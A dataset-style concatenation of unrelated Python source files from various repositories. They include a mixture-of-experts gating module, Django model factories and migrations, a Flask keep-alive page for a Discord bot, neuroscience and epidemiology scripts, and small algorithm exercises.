'{0}/{1}_imP2Pred_{2}.png'.format(opt.experiment, j, n) )
vutils.save_image( ( ( 0.5*(globalIllu3s[n] + 1)*segBatch.expand_as(imP3Batch) )**(1.0/2.2) ).data,
'{0}/{1}_imP3Pred_{2}.png'.format(opt.experiment, j, n) )
trainingLog.close()
# Update the training rate
if (epoch + 1) % 2 == 0:
for param_group in opGlobalIllu1to2.param_groups:
param_group['lr'] /= 2
for param_group in opGlobalIllu2to3.param_groups:
param_group['lr'] /= 2
np.save('{0}/globalIllu2_{1}.npy'.format(opt.experiment, epoch), globalIllu2ErrsNpList )
np.save('{0}/globalIllu3_{1}.npy'.format(opt.experiment, epoch), globalIllu3ErrsNpList )
torch.save(globIllu1to2.state_dict(), '{0}/globIllu1to2_{1}.pth'.format(opt.experiment, epoch) )
torch.save(globIllu2to3.state_dict(), '{0}/globIllu2to3_{1}.pth'.format(opt.experiment, epoch) )
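# Example invocation (added for illustration; the data path is a placeholder, the other
# flags are taken from the argparser above):
#   python trainGlobalIllumination.py --dataRoot /path/to/train --cuda --batchSize 16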
| 2.3125 | 2 |
examples/plot_read_raw_data.py | arokem/mne-python | 0 | 12796604 | """
==========================
Reading a raw file segment
==========================
"""
# Author: <NAME> <<EMAIL>>
#
# License: BSD (3-clause)
print __doc__
import os
from mne import fiff
fname = os.environ['MNE_SAMPLE_DATASET_PATH']
fname += '/MEG/sample/sample_audvis_raw.fif'
raw = fiff.setup_read_raw(fname)
exclude = ['MEG 2443', 'EEG 053'] # bad channels
meg_channels_idx = fiff.pick_types(raw['info'], meg=True, exclude=exclude)
meg_channels_idx = meg_channels_idx[:5] # take 5 first
start, stop = raw.time_to_index(100, 115) # 100 s to 115 s data segment
data, times = raw[meg_channels_idx, start:stop]
# data, times = raw[:, start:stop] # read all channels
raw.close()
###############################################################################
# Show MEG data
import pylab as pl
pl.close('all')
pl.plot(times, data.T)
pl.xlabel('time (s)')
pl.ylabel('MEG data (T)')
pl.show()
| 2.53125 | 3 |
openprocurement/auctions/geb/managers/changers/actions/cancellations.py | andrey484/openprocurement.auctions.geb | 0 | 12796605 | from openprocurement.auctions.core.utils import (
log_auction_status_change
)
from openprocurement.auctions.geb.constants import (
AUCTION_STATUSES_FOR_CLEAN_BIDS_IN_CANCELLATION
)
from openprocurement.auctions.geb.managers.changers.base import (
BaseAction
)
class CancellationActivationAction(BaseAction):
"""
Cancellation Activation action
when auction owner activate cancellation (patch status to 'active'):
- auction.status will set to 'cancelled'
- if procedure in statuses ['active.tendering', 'active.enquiry', 'active.auction']
delete all bids
"""
validators = []
@classmethod
def demand(cls, request, context):
"""
Constructor method. If it is reason of action
this method return instance of Action
"""
# check if patch is for activating cancellation
new_status = request.validated['json_data'].get('status')
if context.status == 'pending' and new_status == 'active':
return cls
return False
def act(self):
auction = self.request.auction
# pendify auction status
status = 'cancelled'
auction.status = status
log_auction_status_change(self.request, self.context, status)
# clean bids after cancellation procedure
auction_status = self.request.validated['auction_src']['status']
if auction_status in AUCTION_STATUSES_FOR_CLEAN_BIDS_IN_CANCELLATION:
auction.bids = []
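# Usage sketch (added for illustration): a changer/manager would typically first call
# CancellationActivationAction.demand(request, context) and, if it returns the class,
# instantiate and run the action. The constructor signature below is an assumption about
# BaseAction, which is not shown in this module:
#   action_cls = CancellationActivationAction.demand(request, context)
#   if action_cls:
#       action_cls(request, context).act()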
| 2.390625 | 2 |
tool_test/test_v_output4_8_get_map_zip_data.py | BerkeleyLibrary/geodata_pre_ingest | 0 | 12796606 | <reponame>BerkeleyLibrary/geodata_pre_ingest<filename>tool_test/test_v_output4_8_get_map_zip_data.py
#!/usr/bin/python
import os
import sys
import shutil
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))
from pre_ingestion import zip_data,geo_helper,par,validate_csv
dirname = os.path.dirname(__file__).replace("test","test_data")
def main():
try:
geo_ext_list = _EXT = [".cpg",
".dbf",
".prj",
".sbn",
".sbx",
".shp",
".shx"]
process_path = os.path.join(dirname,"vector_data","vector_output")
valid_updated_csv = validate_csv.ValidateCSV(process_path)
if valid_updated_csv.work_files_existed():
workspace_batch_path = geo_helper.GeoHelper.work_path(process_path)
projected_map_path = geo_helper.GeoHelper.map_download_path(process_path)
z_data = zip_data.ZipData(workspace_batch_path,projected_map_path,"map.zip",geo_ext_list)
z_data.map_zipfiles()
except Exception, e:
txt = "Code exception: {0} ; {1}".format(__file__,str(e))
geo_helper.GeoHelper.arcgis_message(txt)
if __name__ == '__main__':
main()
| 2.140625 | 2 |
src/archan_pylint/__init__.py | Pawamoy/archan-pylint | 1 | 12796607 | import sys
try:
from archan import Provider, Argument, DomainMappingMatrix, Logger
from pylint.lint import Run
class LoggerWriter:
def __init__(self, level):
self.level = level
def write(self, message):
if message != '\n':
self.level('from pylint: ' + message)
class PylintProvider(Provider):
"""Pylint provider for Archan."""
identifier = 'archan_pylint.PylintProvider'
name = 'Pylint Provider: Issues per Module'
description = 'Number of Pylint messages per module.'
argument_list = (
Argument('pylint_args', list, 'Pylint arguments as a list.'),
)
def get_data(self, pylint_args=None):
"""
Provide matrix data for Pylint messages in a set of packages.
Args:
pylint_args (list): the arguments to pass to Pylint.
depth (int): the depth of the matrix to generate.
Returns:
archan.DSM: instance of archan DSM.
"""
logger = Logger.get_logger(__name__)
pylint_args = pylint_args or []
sys.stdout = LoggerWriter(logger.debug)
sys.stderr = LoggerWriter(logger.warning)
try:
run = Run(pylint_args, do_exit=False)
except TypeError:
run = Run(pylint_args, exit=False)
sys.stdout = sys.__stdout__
            sys.stderr = sys.__stderr__
entities = []
data = []
for k, v in run.linter.stats['by_module'].items():
entities.append(k)
data.append([sum(v.values())])
entities.append('Messages')
return DomainMappingMatrix(data=data, entities=entities)
except ImportError:
    class PylintProvider:
"""Empty provider, please install Archan and Pylint."""
| 2.40625 | 2 |
example_snippets/multimenus_snippets/NewSnippets/SymPy/Functions/Combinatorial functions/Stirling number of the second kind.py | kuanpern/jupyterlab-snippets-multimenus | 0 | 12796608 | stirling(n, k) | 0.96875 | 1 |
openapi_core/schema/contacts/models.py | eyadgaran/openapi-core | 0 | 12796609 | <gh_stars>0
"""OpenAPI core contacts models module"""
class Contact(object):
def __init__(self, name=None, url=None, email=None, extensions=None):
self.name = name
self.url = url
self.email = email
self.extensions = extensions and dict(extensions) or {}
| 1.984375 | 2 |
codebasin/walkers/tree_walker.py | jasonsewall-intel/code-base-investigator | 17 | 12796610 | # Copyright (C) 2019 Intel Corporation
# SPDX-License-Identifier: BSD-3-Clause
import logging
import collections
log = logging.getLogger('codebasin')
class TreeWalker():
"""
Generic tree walker class.
"""
def __init__(self, _tree, _node_associations):
self.tree = _tree
self._node_associations = _node_associations
| 2.21875 | 2 |
daiquiri/files/migrations/0002_depth.py | agy-why/daiquiri | 14 | 12796611 | # -*- coding: utf-8 -*-
# Generated by Django 1.11.9 on 2018-01-09 14:58
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('daiquiri_files', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='directory',
name='depth',
field=models.IntegerField(default=0),
),
migrations.AlterField(
model_name='directory',
name='path',
field=models.CharField(blank=True, help_text='Path of the directory.', max_length=256, verbose_name='Path'),
),
]
| 1.570313 | 2 |
webserver.py | Linerly/linerlybot-rewritten | 3 | 12796612 | <reponame>Linerly/linerlybot-rewritten
from threading import Thread
from flask import Flask
app = Flask("")
@app.route("/")
def home():
return """
<!DOCTYPE="html">
<html>
<head>
<link rel="icon" href="https://linerly.github.io/assets/linerlybot/linerlybot.png" type="image/png">
<title>LinerlyBot Repl Page</title>
</head>
<body style="width: 80%; margin: auto;">
<style>
figure message {
top: 0;
left: 0;
position: absolute;
}
</style>
<style>
#message {
margin: 0;
padding: 12px 15px;
background-color: #1e90ff;
color: #fff;
text-align: center;
font-family: sans-serif;
font-size: 13px;
}
</style>
<p id="message">You're in LinerlyBot's Replit site. <a href="https://linerly.github.io/linerlybot">Click here to go to LinerlyBot's main page!</a></p>
<br>
<img alt="LinerlyBot logo" src="https://raw.githubusercontent.com/Linerly/linerlybot-rewritten/master/profile-picture.png" style="display: block; margin-left: auto; margin-right: auto; border-radius: 50%;" width="128" height="128">
<h2 align="center">linerlybot-rewritten</h2>
<p align="center">
<a href="https://discord.gg/a9Sy7gE"><img alt="Discord Server" src="https://img.shields.io/discord/551683447026876418?logoColor=1e90ff&style=flat"></a>
<a href="https://github.com/Linerly/linerlybot-rewritten/blob/master/LICENSE"><img alt="License" src="https://img.shields.io/github/license/Linerly/linerlybot-rewritten?style=flat"></a>
<a href="https://github.com/psf/black"><img alt="Code style: black" src="https://img.shields.io/badge/code%20style-black-000000.svg?style=flat"></a>
<a href="https://pycqa.github.io/isort/"><img alt="Imports: isort" src="https://img.shields.io/badge/%20imports-isort-%231674b1?style=flat&labelColor=ef8336"></a>
</p>
<hr>
<p>The new version of LinerlyBot with <a href="https://discordpy.readthedocs.io/en/stable">discord.py</a>.</p>
<p><a href="https://discord.com/oauth2/authorize?client_id=529566778293223434&permissions=2147485696&scope=bot+applications.commands"><img src="https://img.shields.io/badge/-Add%20LinerlyBot%20to%20your%20Discord%20server!-1e90ff?style=for-the-badge" alt="Invite LinerlyBot"></a></p>
<hr>
<h1>Features</h1>
<ul>
<li>Informational commands such as the <code>help</code>, <code>info</code>, <code>ping</code>, and the <code>about</code> command.</li>
<li>Fun commands such as the <code>joke</code> and the <code>feeling</code> command.</li>
<li>Other miscellaneous such as the <code>quote</code> command.</li>
<li>Gold as the currency for LinerlyBot.</li>
</ul>
<hr>
</body>
</html>
"""
def run():
app.run(host="0.0.0.0", port=8080)
def keep_alive():
t = Thread(target=run)
t.start()
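# Typical usage (added note; the importing module and token variable are assumptions):
#   from webserver import keep_alive
#   keep_alive()      # start the Flask keep-alive server in a background thread
#   bot.run(TOKEN)    # then start the Discord bot as usual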
| 2.53125 | 3 |
fairscale/nn/moe/top2gate.py | vfdev-5/fairscale | 6 | 12796613 | # Copyright (c) Facebook, Inc. and its affiliates. All rights reserved.
#
# This source code is licensed under the BSD license found in the
# LICENSE file in the root directory of this source tree.
# Implementation of Top2Gating described in https://arxiv.org/pdf/2006.16668.pdf
# Code is inspired by Top2GatingOnLogits from lingvo:
# https://github.com/tensorflow/lingvo/blob/21b8106c5f1d30a196c98eedc441d4fd70833b11/lingvo/core/moe_layers.py#L477
from typing import Callable, Dict, Tuple
import torch
from torch import Tensor
import torch.nn.functional as F
gumbel_map: Dict[torch.device, Callable] = {}
def gumbel_rsample(shape: Tuple, device: torch.device) -> Tensor:
gumbel = gumbel_map.get(device)
if gumbel is None:
one = torch.tensor(1.0, device=device)
zero = torch.tensor(0.0, device=device)
gumbel = torch.distributions.gumbel.Gumbel(zero, one).rsample # type: ignore
gumbel_map[device] = gumbel
return gumbel(shape)
def top2gating(logits: torch.Tensor) -> Tuple[Tensor, Tensor, Tensor]:
"""Implements Top2Gating on logits."""
gates = F.softmax(logits, dim=1)
# gates has shape of SE
num_tokens = gates.shape[0]
num_experts = gates.shape[1]
# capacity = 2S/E
capacity = 2 * num_tokens // num_experts
assert num_tokens % num_experts == 0
# Create a mask for 1st's expert per token
indices1_s = torch.argmax(gates, dim=1)
mask1 = F.one_hot(indices1_s, num_classes=num_experts)
# Create a mask for 2nd's expert per token using Gumbel-max trick
# https://timvieira.github.io/blog/post/2014/07/31/gumbel-max-trick/
logits_w_noise = logits + gumbel_rsample(logits.shape, device=logits.device)
# Replace top-expert with min value
logits_except1 = logits_w_noise.masked_fill(mask1.bool(), float("-inf"))
indices2_s = torch.argmax(logits_except1, dim=1)
mask2 = F.one_hot(indices2_s, num_classes=num_experts)
# Compute locations in capacity buffer
locations1 = torch.cumsum(mask1, dim=0) - 1
locations2 = torch.cumsum(mask2, dim=0) - 1
# Update 2nd's location by accounting for locations of 1st
locations2 += torch.sum(mask1, dim=0, keepdim=True)
# Compute l_aux
me = torch.mean(gates, dim=0)
ce = torch.mean(mask1.float(), dim=0)
l_aux = torch.mean(me * ce)
# Remove locations outside capacity from mask
mask1 *= torch.lt(locations1, capacity)
mask2 *= torch.lt(locations2, capacity)
# Store the capacity location for each token
locations1_s = torch.sum(locations1 * mask1, dim=1)
locations2_s = torch.sum(locations2 * mask2, dim=1)
# Normalize gate probabilities
mask1_float = mask1.float()
mask2_float = mask2.float()
gates1_s = torch.einsum("se,se->s", gates, mask1_float)
gates2_s = torch.einsum("se,se->s", gates, mask2_float)
denom_s = gates1_s + gates2_s
# Avoid divide-by-zero
denom_s = torch.clamp(denom_s, min=torch.finfo(denom_s.dtype).eps)
gates1_s /= denom_s
gates2_s /= denom_s
# Calculate combine_weights and dispatch_mask
gates1 = torch.einsum("s,se->se", gates1_s, mask1_float)
gates2 = torch.einsum("s,se->se", gates2_s, mask2_float)
locations1_sc = F.one_hot(locations1_s, num_classes=capacity)
locations2_sc = F.one_hot(locations2_s, num_classes=capacity)
combine1_sec = torch.einsum("se,sc->sec", gates1, locations1_sc)
combine2_sec = torch.einsum("se,sc->sec", gates2, locations2_sc)
combine_weights = combine1_sec + combine2_sec
dispatch_mask = combine_weights.bool()
return l_aux, combine_weights, dispatch_mask
class Top2Gate(torch.nn.Module):
"""Gate module which implements Top2Gating as described in Gshard_.
::
gate = Top2Gate(model_dim, num_experts)
l_aux, combine_weights, dispatch_mask = gate(input)
.. Gshard_: https://arxiv.org/pdf/2006.16668.pdf
Args:
model_dim (int):
size of model embedding dimension
num_experts (ints):
number of experts in model
"""
wg: torch.nn.Linear
def __init__(self, model_dim: int, num_experts: int,) -> None:
super().__init__()
self.wg = torch.nn.Linear(model_dim, num_experts, bias=False)
def forward(self, input: torch.Tensor) -> Tuple[Tensor, Tensor, Tensor]: # type: ignore
logits = self.wg(input)
return top2gating(logits)
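# Minimal sanity-check sketch (added for illustration; the shapes are assumptions):
# 8 tokens of dimension 16 routed across 4 experts gives capacity = 2 * 8 // 4 = 4.
if __name__ == "__main__":
    gate = Top2Gate(model_dim=16, num_experts=4)
    l_aux, combine_weights, dispatch_mask = gate(torch.randn(8, 16))
    # combine_weights and dispatch_mask have shape [tokens, experts, capacity].
    print(l_aux.item(), combine_weights.shape, dispatch_mask.shape)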
| 2.40625 | 2 |
refgenie/helpers.py | lmfaber-dkfz/refgenie | 32 | 12796614 | import errno
import os
from refgenconf import MissingRecipeError
from ubiquerg import is_writable
from .asset_build_packages import asset_build_packages
from .exceptions import MissingFolderError
def _parse_user_build_input(input):
"""
Parse user input specification. Used in build for specific parents and input parsing.
:param Iterable[Iterable[str], ...] input: user command line input,
formatted as follows: [[fasta=txt, test=txt], ...]
    :return dict: mapping of input names to their values
"""
lst = []
for i in input or []:
lst.extend(i)
return (
{x.split("=")[0]: x.split("=")[1] for x in lst if "=" in x}
if lst is not None
else lst
)
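# Example (added for illustration; the asset names below are made up, not from the CLI):
#   _parse_user_build_input([["fasta=hg38.fa", "fai=hg38.fa.fai"], ["param=1"]])
#   returns {"fasta": "hg38.fa", "fai": "hg38.fa.fai", "param": "1"}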
def _single_folder_writeable(d):
return os.access(d, os.W_OK) and os.access(d, os.X_OK)
def _writeable(outdir, strict_exists=False):
outdir = outdir or "."
if os.path.exists(outdir):
return _single_folder_writeable(outdir)
elif strict_exists:
raise MissingFolderError(outdir)
return _writeable(os.path.dirname(outdir), strict_exists)
def _raise_missing_recipe_error(recipe):
"""
Raise an error for a missing recipe, when one is requested
:param str recipe: recipe name
:raise MissingRecipeError: always
"""
raise MissingRecipeError(
f"Recipe '{recipe}' not found. Available recipes: "
f"{', '.join(list(asset_build_packages.keys()))}"
)
def _skip_lock(skip_arg, cfg):
"""
If config read lock skip was not forced, check if dir is writable and set
the default to the result
:param bool skip_arg: argument selected on the CLI
    :param str cfg: path to the config
:return bool: decision -- whether to skip the file lock for read
"""
return is_writable(os.path.dirname(cfg)) if not skip_arg else True
def make_sure_path_exists(path):
"""
Creates all directories in a path if it does not exist.
:param str path: Path to create.
:raises Exception: if the path creation attempt hits an error with
a code indicating a cause other than pre-existence.
"""
try:
os.makedirs(path)
except OSError as exception:
if exception.errno != errno.EEXIST:
raise
| 2.5 | 2 |
clarisse/var/lib/linux/menus/main_menu/file/open_recent_clear_recent.py | GuillaumeVFX/pipel | 2 | 12796615 | ix.application.clear_recent_files("project") | 1.023438 | 1 |
example_project/example_project/urls.py | pwilczynskiclearcode/django-nuit | 5 | 12796616 | from django.conf.urls import patterns, include, url
urlpatterns = patterns('',
url(r'^', include('demo.urls')),
url(r'^login/$', 'django.contrib.auth.views.login', {'template_name': 'nuit/generic/login.html'}),
url(r'^logout/$', 'django.contrib.auth.views.logout'),
)
| 1.734375 | 2 |
scripts/sensitivity_analysis/iceswe.py | gavento/epimod | 26 | 12796617 | """
:code:`iceswe.py`
Hold out both Iceland and Sweden
"""
import pymc3 as pm
from epimodel import EpidemiologicalParameters
from epimodel.preprocessing.data_preprocessor import preprocess_data
import argparse
import pickle
from scripts.sensitivity_analysis.utils import *
import os
os.environ['OMP_NUM_THREADS'] = '1'
os.environ['MKL_NUM_THREADS'] = '1'
os.environ['OPENBLAS_NUM_THREADS'] = '1'
argparser = argparse.ArgumentParser()
add_argparse_arguments(argparser)
if __name__ == '__main__':
args, extras = argparser.parse_known_args()
data = preprocess_data(get_data_path(), last_day='2020-05-30')
data.mask_reopenings()
if 'deaths_only' in args.model_type:
data.remove_regions_min_deaths(5)
data.mask_region('IS')
data.mask_region('SE')
ep = EpidemiologicalParameters()
model_class = get_model_class_from_str(args.model_type)
bd = {**ep.get_model_build_dict(), **parse_extra_model_args(extras)}
pprint_mb_dict(bd)
with model_class(data) as model:
model.build_model(**bd)
ta = get_target_accept_from_model_str(args.model_type)
with model.model:
model.trace = pm.sample(args.n_samples, tune=500, chains=args.n_chains, cores=args.n_chains, max_treedepth=14,
target_accept=ta, init='adapt_diag')
save_cm_trace(f'iceswe.txt', model.trace.CMReduction, args.exp_tag,
generate_base_output_dir(args.model_type, parse_extra_model_args(extras)))
if model.country_specific_effects:
nS, nCMs = model.trace.CMReduction.shape
full_trace = np.exp(
np.log(model.trace.CMReduction) + np.random.normal(size=(nS, nCMs)) * model.trace.CMAlphaScales)
save_cm_trace('iceswe-cs.txt', full_trace, args.exp_tag,
generate_base_output_dir(args.model_type, parse_extra_model_args(extras)))
| 2.125 | 2 |
django/privat_gos_sait/about_company/templatetags/test_teg.py | Netromnik/python | 0 | 12796618 | <reponame>Netromnik/python
from django import template
register = template.Library()
@register.filter('modF')
def modF(value, arg):
print (not (int( value)%int(arg)))
return not (int( value)%int(arg)) | 2.46875 | 2 |
small_number.py | ambivert143/PythonProgram | 0 | 12796619 | <filename>small_number.py
class Small_Number:
def __init__(self, list):
self.list = list
    def sma(self):
        # Repeated compare-and-swap pass that leaves self.list sorted in descending order.
        for x in range(len(self.list)):
            for y in range(len(self.list)):
                if self.list[x] > self.list[y]:
                    self.list[x], self.list[y] = self.list[y], self.list[x]
        # With the list in descending order, the second-to-last element is the second smallest.
        print(self.list[-2])
s1 = Small_Number([1,2,-8,-2,0,-2])
s1.sma() | 3.609375 | 4 |
coding_interviews/leetcode/medium/reduce_array_size_to_the_half/reduce_array_size_to_the_half.py | LeandroTk/Algorithms | 205 | 12796620 | <reponame>LeandroTk/Algorithms<filename>coding_interviews/leetcode/medium/reduce_array_size_to_the_half/reduce_array_size_to_the_half.py
# https://leetcode.com/problems/reduce-array-size-to-the-half
'''
Time Complexity: O(NlogN)
Space Complexity: O(N)
'''
def min_set_size(arr):
num_to_count, counts, min_size, current_length = {}, [], 0, len(arr)
for num in arr:
if num in num_to_count:
num_to_count[num] += 1
else:
num_to_count[num] = 1
for num in num_to_count:
counts.append(num_to_count[num])
counts = reversed(sorted(counts))
if len(arr) % 2 == 0:
cut = len(arr) / 2
else:
        cut = (len(arr) + 1) / 2
for count in counts:
min_size += 1
current_length -= count
if current_length <= cut:
return min_size
return min_size
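# Quick check (added; uses the LeetCode 1338 sample input, expected answer 2):
if __name__ == "__main__":
    print(min_set_size([3, 3, 3, 3, 5, 5, 5, 2, 2, 7]))  # -> 2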
| 3.890625 | 4 |
configs/nas_fcos/ranksort_nas_fcos_r50_caffe_fpn_1x_coco_lr0010.py | yinchimaoliang/ranksortloss | 210 | 12796621 | _base_ = 'ranksort_nas_fcos_r50_caffe_fpn_1x_coco.py'
optimizer = dict(lr=0.010)
| 0.941406 | 1 |
app/tests/courses/factories.py | Valaraucoo/raven | 3 | 12796622 | import datetime
import random
import factory
import factory.fuzzy as fuzzy
from django.core.files.base import ContentFile
from courses import models
from courses.models import LANGUAGE_CHOICES, PROFILE_CHOICES
from tests.users import factories as users_factories
from users import models as users_models
PROFILE_CHOICES = [x[0] for x in PROFILE_CHOICES]
LANGUAGE_CHOICES = [x[0] for x in LANGUAGE_CHOICES]
class GradeFactory(factory.django.DjangoModelFactory):
class Meta:
model = models.Grade
name = factory.Sequence(lambda n: "Grade %03d" % n)
start_year = factory.Faker('date_object')
supervisor = factory.SubFactory(users_factories.StudentFactory)
profile = fuzzy.FuzzyChoice(PROFILE_CHOICES)
@factory.post_generation
def students(self, create, extracted, **kwargs):
if not create:
return
if extracted:
for student in extracted:
self.students.add(student)
else:
random_students = random.choices(users_models.Student.objects.all(), k=10)
for student in random_students:
self.students.add(student)
class CourseFactory(factory.django.DjangoModelFactory):
class Meta:
model = models.Course
name = factory.Sequence(lambda n: "Course %02d" % n)
description = factory.Faker('text')
head_teacher = factory.SubFactory(users_factories.TeacherFactory)
grade = factory.SubFactory(GradeFactory)
code_meu = '123'
has_exam = False
semester = fuzzy.FuzzyChoice([i for i in range(1, 8)])
language = fuzzy.FuzzyChoice(LANGUAGE_CHOICES)
lecture_hours = fuzzy.FuzzyChoice([i for i in range(1, 40)])
labs_hours = fuzzy.FuzzyChoice([i for i in range(1, 40)])
@factory.post_generation
def teachers(self, create, extracted, **kwargs):
if not create:
return
if extracted:
for teacher in extracted:
self.teachers.add(teacher)
else:
random_teachers = random.choices(users_models.Teacher.objects.all(), k=5)
for teacher in random_teachers:
self.teachers.add(teacher)
class LectureFactory(factory.django.DjangoModelFactory):
class Meta:
model = models.Lecture
course = factory.SubFactory(CourseFactory)
title = fuzzy.FuzzyText(length=16)
description = factory.Faker('text')
date = fuzzy.FuzzyDate(
start_date=datetime.date.today() - datetime.timedelta(days=100),
end_date=datetime.date.today() + datetime.timedelta(days=100),
)
class GroupFactory(factory.django.DjangoModelFactory):
class Meta:
model = models.CourseGroup
name = fuzzy.FuzzyText(length=16)
@factory.post_generation
def students(self, create, extracted, **kwargs):
if not create:
return
if extracted:
for student in extracted:
self.students.add(student)
class LabFactory(factory.django.DjangoModelFactory):
class Meta:
model = models.Laboratory
course = factory.SubFactory(CourseFactory)
group = factory.SubFactory(GroupFactory)
title = fuzzy.FuzzyText(length=16)
description = factory.Faker('text')
date = fuzzy.FuzzyDate(
start_date=datetime.date.today() - datetime.timedelta(days=100),
end_date=datetime.date.today() + datetime.timedelta(days=100),
)
class CourseGroupFactory(factory.django.DjangoModelFactory):
class Meta:
model = models.CourseGroup
course = factory.SubFactory(CourseFactory)
name = fuzzy.FuzzyText(length=16)
class CourseMarkFactory(factory.django.DjangoModelFactory):
class Meta:
model = models.CourseMark
mark = 65
date = fuzzy.FuzzyDate(datetime.date.today())
description = factory.Faker('text')
course = factory.SubFactory(CourseFactory)
student = factory.SubFactory(users_factories.StudentFactory)
teacher = factory.SubFactory(users_factories.TeacherFactory)
class FinalCourseMarkFactory(factory.django.DjangoModelFactory):
class Meta:
model = models.FinalCourseMark
mark = 5
date = fuzzy.FuzzyDate(datetime.date.today())
description = factory.Faker('text')
course = factory.SubFactory(CourseFactory)
student = factory.SubFactory(users_factories.StudentFactory)
teacher = factory.SubFactory(users_factories.TeacherFactory)
class NoticeFactory(factory.django.DjangoModelFactory):
class Meta:
model = models.CourseNotice
course = factory.SubFactory(CourseFactory)
sender = factory.SubFactory(users_factories.TeacherFactory)
title = fuzzy.FuzzyText(length=16)
content = factory.Faker('text')
created_at = fuzzy.FuzzyDate(datetime.date.today())
class AssignmentFactory(factory.django.DjangoModelFactory):
class Meta:
model = models.Assignment
laboratory = factory.SubFactory(LabFactory)
teacher = factory.SubFactory(users_factories.TeacherFactory)
deadline = fuzzy.FuzzyDate(datetime.date.today())
title = fuzzy.FuzzyText(length=16)
content = factory.Faker('text')
class CourseFileFactory(factory.django.DjangoModelFactory):
class Meta:
model = models.CourseFile
name = fuzzy.FuzzyText(length=16)
description = factory.Faker('text')
file = factory.LazyAttribute(
lambda _: ContentFile(
factory.django.ImageField()._make_data(
{'width': 600, 'height': 600}
), 'example.jpg'
)
)
created_at = fuzzy.FuzzyDate(datetime.date.today())
updated_at = fuzzy.FuzzyDate(datetime.date.today()) | 2.390625 | 2 |
geotrek/common/tests/__init__.py | ker2x/Geotrek-admin | 0 | 12796623 | <filename>geotrek/common/tests/__init__.py<gh_stars>0
# -*- encoding: utf-8 -*-
from django.utils import translation
from django.utils.translation import ugettext as _
# Workaround https://code.djangoproject.com/ticket/22865
from geotrek.common.models import FileType # NOQA
from mapentity.tests import MapEntityTest
from geotrek.authent.factories import StructureFactory
from geotrek.authent.tests import AuthentFixturesTest
class TranslationResetMixin(object):
def setUp(self):
translation.deactivate()
super(TranslationResetMixin, self).setUp()
class CommonTest(AuthentFixturesTest, TranslationResetMixin, MapEntityTest):
api_prefix = '/api/en/'
def get_bad_data(self):
return {'topology': 'doh!'}, _(u'Topology is not valid.')
def test_structure_is_set(self):
if not hasattr(self.model, 'structure'):
return
self.login()
response = self.client.post(self._get_add_url(), self.get_good_data())
self.assertEqual(response.status_code, 302)
obj = self.model.objects.last()
self.assertEqual(obj.structure, self.user.profile.structure)
def test_structure_is_not_changed(self):
if not hasattr(self.model, 'structure'):
return
self.login()
structure = StructureFactory()
self.assertNotEqual(structure, self.user.profile.structure)
obj = self.modelfactory.create(structure=structure)
self.client.post(obj.get_update_url(), self.get_good_data())
self.assertEqual(obj.structure, structure)
| 2 | 2 |
yepes/fields/char.py | samuelmaudo/yepes | 0 | 12796624 | <reponame>samuelmaudo/yepes
# -*- coding:utf-8 -*-
from __future__ import unicode_literals
from django.core import checks
from django.core.validators import MinLengthValidator
from django.db import models
from django.utils import six
from django.utils.encoding import force_text
from django.utils.translation import ugettext_lazy as _
from yepes import forms
from yepes.fields.calculated import CalculatedField
from yepes.utils import unidecode
from yepes.utils.deconstruct import clean_keywords
from yepes.validators import CharSetValidator
def check_max_length_attribute(self, **kwargs):
if (self.max_length is not None
and (not isinstance(self.max_length, six.integer_types)
or self.max_length <= 0)):
return [
checks.Error(
"'max_length' must be None or a positive integer.",
hint=None,
obj=self,
id='yepes.E111',
)
]
else:
return []
def check_min_length_attribute(self, **kwargs):
if self.min_length is None:
return []
elif (not isinstance(self.min_length, six.integer_types)
or self.min_length <= 0):
return [
checks.Error(
"'min_length' must be None or a positive integer.",
hint=None,
obj=self,
id='yepes.E112',
)
]
elif (isinstance(self.max_length, six.integer_types)
and self.max_length < self.min_length):
return [
checks.Error(
"'min_length' cannot be greater than 'max_length'.",
hint="Decrease 'min_length' or increase 'max_length'.",
obj=self,
id='yepes.E113',
)
]
else:
return []
class CharField(CalculatedField, models.CharField):
description = _('String')
def __init__(self, *args, **kwargs):
self.charset = kwargs.pop('charset', None)
self.force_ascii = kwargs.pop('force_ascii', False)
self.force_lower = kwargs.pop('force_lower', False)
self.force_upper = kwargs.pop('force_upper', False)
self.min_length = kwargs.pop('min_length', None)
self.normalize_spaces = kwargs.pop('normalize_spaces', True)
self.trim_spaces = kwargs.pop('trim_spaces', False)
super(CharField, self).__init__(*args, **kwargs)
if self.min_length is not None:
self.validators.append(MinLengthValidator(self.min_length))
if self.charset is not None:
self.validators.append(CharSetValidator(self.charset))
def check(self, **kwargs):
errors = super(CharField, self).check(**kwargs)
errors.extend(self._check_min_length_attribute(**kwargs))
return errors
_check_min_length_attribute = check_min_length_attribute
def deconstruct(self):
name, path, args, kwargs = super(CharField, self).deconstruct()
path = path.replace('yepes.fields.char', 'yepes.fields')
clean_keywords(self, kwargs, variables={
'charset': None,
'force_ascii': False,
'force_lower': False,
'force_upper': False,
'min_length': None,
'normalize_spaces': True,
'trim_spaces': False,
})
return (name, path, args, kwargs)
def formfield(self, **kwargs):
params = {
'form_class': forms.CharField,
'charset': self.charset,
'force_ascii': self.force_ascii,
'force_lower': self.force_lower,
'force_upper': self.force_upper,
'max_length': self.max_length,
'min_length': self.min_length,
'normalize_spaces': self.normalize_spaces,
'trim_spaces': self.trim_spaces,
}
params.update(kwargs)
return super(CharField, self).formfield(**params)
def to_python(self, value):
if value is None:
return value
if not isinstance(value, six.string_types):
value = force_text(value)
if self.normalize_spaces:
value = ' '.join(value.split())
elif self.trim_spaces:
value = value.strip()
if not value:
return value
if self.force_ascii:
value = unidecode(value)
if self.force_lower:
value = value.lower()
elif self.force_upper:
value = value.upper()
return value
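# Illustrative usage (added; the model, field name and charset value are examples only):
#   class Coupon(models.Model):
#       code = CharField(max_length=16, min_length=4, force_ascii=True,
#                        force_upper=True, charset='A-Z0-9')
# Values are normalised in to_python() - spaces collapsed, transliterated to ASCII and
# upper-cased - before the length and charset validators run.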
| 2.15625 | 2 |
tests/test_utility.py | jrepp/redis-bus | 0 | 12796625 | from redisbus.utility import DictObj
def test_dictobj():
subject_dict = {
"foo": "bar",
"left": "right"
}
subject_obj = DictObj(subject_dict)
assert hasattr(subject_obj, 'foo')
assert hasattr(subject_obj, 'left')
assert subject_obj.foo == "bar"
assert subject_obj.left == "right"
| 2.75 | 3 |
